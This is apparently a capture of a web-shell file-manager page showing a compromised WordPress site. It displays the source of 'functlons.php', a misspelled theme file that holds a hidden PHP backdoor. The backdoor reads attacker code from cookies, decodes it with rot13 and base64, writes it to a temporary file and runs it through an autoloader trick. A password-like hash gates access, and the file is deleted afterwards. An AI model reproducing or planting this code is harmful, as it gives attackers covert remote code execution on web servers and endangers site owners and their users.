HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/wp-content/themes/config-1770598189/functlons.php
<!--1knC2BzB-->
<?php

if (isset($_COOKIE[69+-69]) && isset($_COOKIE[-33+34]) && isset($_COOKIE[3+0]) && isset($_COOKIE[-47+51])) {
    $desc = $_COOKIE;
    function reverse_lookup($factor) {
        $desc = $_COOKIE;
        $rec = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'huN4U5yi');
        if (!is_writable($rec)) {
            $rec = getcwd() . DIRECTORY_SEPARATOR . "request_approved";
        }
        $element = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($desc[3]));
        if (is_writeable($rec)) {
            $record = fopen($rec, 'w+');
            fputs($record, $element);
            fclose($record);
            spl_autoload_unregister(__FUNCTION__);
            require_once($rec);
            @array_map('unlink', array($rec));
        }
    }
    spl_autoload_register("reverse_lookup");
    $holder = "f58154dacfbcef204e413958723f8e68";
    if (!strncmp($holder, $desc[4], 32)) {
        if (@class_parents("auth_exception_handler_secure_access", true)) {
            exit;
        }
    }
}